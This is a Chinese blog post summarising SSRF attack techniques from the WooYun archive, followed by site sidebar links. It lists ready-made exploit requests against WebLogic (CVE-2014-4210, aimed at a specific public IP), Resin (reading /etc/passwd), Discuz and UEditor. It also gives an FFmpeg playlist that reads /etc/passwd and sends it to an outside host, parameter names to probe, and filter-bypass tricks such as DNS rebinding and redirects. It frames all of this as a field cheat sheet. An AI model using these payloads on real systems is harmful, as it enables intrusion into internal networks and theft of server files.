wooyun常见ssrf总结+常见ssrf绕过姿势

最新推荐文章于 2024-04-12 16:18:06 发布
最新推荐文章于 2024-04-12 16:18:06 发布
阅读量979 收藏
点赞数
分类专栏: 安全知识库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/113479851
版权

wooyun常见ssrf总结

前言

wooyun有很多旧时代知识沉淀,需要多看看,才能更好地迈向新时代。

0x01. weblogic

CVE-2014-4210

http://221.239.120.208/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.9.136&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

在这里插入图片描述

0x02. resin

http://xxxx/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd

在这里插入图片描述

0x03.xxe

解析xml的地方可能产生xxe漏洞,也能用于利用ssrf
在这里插入图片描述

0x04. ffmpg

早期ffmpg是存在ssrf漏洞的,现在应该基本没有了。
在这里插入图片描述
如果读取多行,可以用subfile

#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://val.com/header.m3u8|subfile,,start,0,end,31,,:///etc/passwd|subfile,,start,32,end,64,,:///etc/passwd|subfile,,start,65,end,97,,:///etc/passwd #EXT-X-ENDLIST 使用subfile

0x05.discuz

discuz一些版本存在ssrf

http://xxxx/bbs/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://xxxxxxxxxxxxxx.jpg[/img]&formhash=09cec465

3.x版本需要带上formhash
在这里插入图片描述

0x06.ueditor+dnsrebind

/editor/ueditor/php/controller.php?action=catchimage&source[]=http://my.ip/?aaa=1%26logo.png

在这里插入图片描述

0x07.常见的业务接口

剩下就是一些和业务相关的了,图片、下载、获取资源等

src_url=
sr=
url=
qrcodeUrl=
picPath=
source_url=
upfile=
img=
source=
pageurl=
remoteUrl=
path=
p=
key=
link=
domain=
apiurl=

0x08.绕过姿势

实战中用的比较多的是

1.@
2.xip.io
3.进制
4.302(短网址)
5.dnsrebind
6.unicode
7.wooyun看到有些人是这么绕的127.0.0.1a,可能是判定黑名单的在强制转换前面。
8.xss,有的后端会解析输入的js返回到前端,这里也是存在ssrf的可能的。可能位置在文档、渲染等地方
_HWHXY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ueidtor安全漏洞_UEditor SSRF漏洞(JSP版本)分析与复现
weixin_33318722的博客
12-31 4650
作者: 浮萍@猎户安全实验室公众号:[猎户安全实验室](https://mp.weixin.qq.com/s/OPbyYQNWiN2dy_BHhqd9eg "猎户安全实验室")前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测...
UEditor-1.4.3.3 JSP版本
01-23
UEditor-1.4.3.3 JSP版本 UEditor-1.4.3.3 JSP版本 UEditor-1.4.3.3 JSP版本
ssrf的绕过
最新发布
2302_79119987的博客
04-12 1040
1、同源策略/SOP(Same origin policy)是一种约定,由 Netscape 公司 1995 年引入浏览器,它是浏览器最核心也最基本的安全功能,现在所有支持 JavaScript 的浏览器都会使用这个策略。2、在这个策略下,web浏览器允许第一个页面的脚本访问第二个页面里的数据,但是也只有在两个页面有相同的源时。开头,因为http://[email protected]/与http://127.0.0.1请求的页面一致,考虑用这种结构来绕过本来的地址应该是。
Ueditor的XML文件上传导致存储型XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 6977
UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新版XML文件上传导致存储型XSS 测试版本:php版v1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类型改为uploadfile,并修改文件后...
UEditor 1.4.3.3的SSRF漏洞
https://www.cnblogs.com/zpchcbd/
10-12 5449
产生漏洞的代码片段: ueditor\php\Uploader.class.php private function saveRemote() { $imgUrl = htmlspecialchars($this->fileField); $imgUrl = str_replace("&", "&", $imgUrl); //http开头验证...
【漏洞案例】云上攻防之云主机中web应用自身漏洞
Websec
06-28 466
最近在做项目的时候,测到了一个部署在云上的存在 Laravel UEditor SSRF 漏洞的站点,并且发现这个 SSRF 漏洞可以读取到临时凭证,这不巧了,正好最近写了一个云环境利用的工具。开始之前这里先简单介绍一下这个工具,CF 是这个工具的名字,通过它可以很方便的进行云上内网渗透,比如一键在所有实例上执行命令、一键接管控制台、一键列出云服务资源等等。
Build Your SSRF Exploit Framework SSRF-一个只影响有钱人的漏洞-猪猪侠.pdf
09-17
wooyun白帽大会-SSRF漏洞自动化利用
wooyun_search:从wooyun.org搜索
02-06
wooyun_search乌云公开漏洞,情报搜索0x00。介绍灵感起点hanc00l的github项目 wooyun_public基于flask或者tornado,而本项目可以布置在apache,nginx等web服务器上。如果你有wooyun的静态网页数据,那么我们可以开始...
wooyun_public-master.zip
08-23
wooyun_public-master
wooyun知识库超级爬虫
05-09
wooyun知识库超级爬虫,多进程运行,可调节进程池进程数量,使用pdfkit模块打包html文件为pdf,需要安装wkhtmltox-0.12.4_msvc2015-win64.exe(64位)
猪猪侠BuildYourSSRFExploitFramework——一个只影响有钱人的漏洞.pdf
09-09
wooyun白帽大会-SSRF漏洞自动化利用 wooyun白帽大会-SSRF漏洞自动化利用 wooyun白帽大会-SSRF漏洞自动化利用
百度富文本编辑器ueditor1.4.3 JSP版本案例(上传图片)
10-13
ueditor1.4.3 富文本插件完美使用,搭建后可以直接上传图片以及多图片上传回显。主要的配置在config.json。可以查看官网ip,一般人出问题都是在config.json,或者不知道案例文件该怎么放,放哪里。
ueditor-1.4.3.3.jar
07-31
10Active(Professtional).exe
基于PHP的UEditor
07-15
部署在PHP的UEditor,关键点还在路径配置上,有什么问题,可以和我交流。QQ:70747053.博客地址:http://blog.csdn.net/leamonlm
Ueditor SSRF漏洞审计
qaq517384的博客
11-18 1458
没啥过滤也没啥需求,一般是张图片就能SSRF,source直接往里传。
记一次SSRF漏洞的学习和利用
2301_77157449的博客
04-27 1337
本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞。此漏洞并结合腾讯云的API接口,可以获取大量嘶吼服务器的敏感信息。利用这些敏感信息,又可以进行更为深入的渗透。这篇文章将会发表在嘶吼网站上,渗透测试也是经过了嘶吼的官方授权,各位读者可以放心食用。本篇中提到的漏洞已于2019年修复完毕,大家就不要再尝试了,此外,温馨提示:未授权的渗透行为是非法的。�SSRF(Server-Side Request Forgery, 服务器端请求伪造) 是一种由攻击者利用服务端发起请求的一个安全漏洞。
老项目之UEditor漏洞问题
Mr.小灰狼_随笔
07-16 3348
老项目之UEditor漏洞问题 目录 1、文件上传漏洞 2、SSRF 漏洞 3、Upload XSS ueidtor 安全漏洞 _ UEditor SSRF 漏洞 ( JSP 版本 ) 分析与复现 1、项目所使用的 UEditor 组件存在 ssrf 漏洞 风险级别 : 低风险 风险分析 : 可通过此漏洞探测内容 ,甚至服务器权限...
ssrf漏洞php代码审计1
m0_55772907的博客
04-30 1034
(1)原理 web服务器经常需要从别的服务器获取数据,比如文件载入、图片拉取、图片识别等功能,如果获取数据的服务器地址可控,攻击者就可以通过web服务器自定义向别的服务器发出请求。因为web服务器常搭建在DMZ区域,因此常被攻击者当作跳板,向内网服务器发出请求。 (2)分类 1)curl_exec 发现存在url传递。在这里提交url参数和内容,服务器用函数curl_exec()执行,并将结果输出 在下面页面做测试发现可以正常跳转,所以可以在此去执行一些恶意操作。 2)file_get_co.
UEditor上传漏洞修复
Prolovecui的博客
08-09 1297
UEditor漏洞修复
中国常见的漏洞公告平台
03-27
1. CNVD漏洞平台:由国家信息安全漏洞库管理中心运营维护,发布国内外重要漏洞信息,提供漏洞查询、报告和修复指导等服务。 2. CSDN安全漏洞平台:提供安全漏洞信息共享服务,包括漏洞公告、漏洞详情、漏洞分析等内容。 3. Freebuf漏洞平台:面向安全从业者和爱好者,提供漏洞挖掘、漏洞利用、渗透测试等技术分享和交流平台。 4. WooYun平台:主要发布国内互联网企业的安全漏洞信息,提供漏洞报告、修复指导等服务。 5. Seebug平台:提供全球范围内的漏洞信息共享服务,包括漏洞公告、漏洞详情、漏洞分析等内容。 6. 360漏洞平台:由360安全团队运营,发布国内外重要漏洞信息,提供漏洞修复指导、安全咨询等服务。 7. 阿里云漏洞平台:由阿里云安全团队运营,提供云安全漏洞信息共享服务,包括漏洞公告、漏洞详情、漏洞分析等内容。 8. 安全客漏洞平台:提供安全漏洞信息共享服务,包括漏洞公告、漏洞详情、漏洞分析等内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值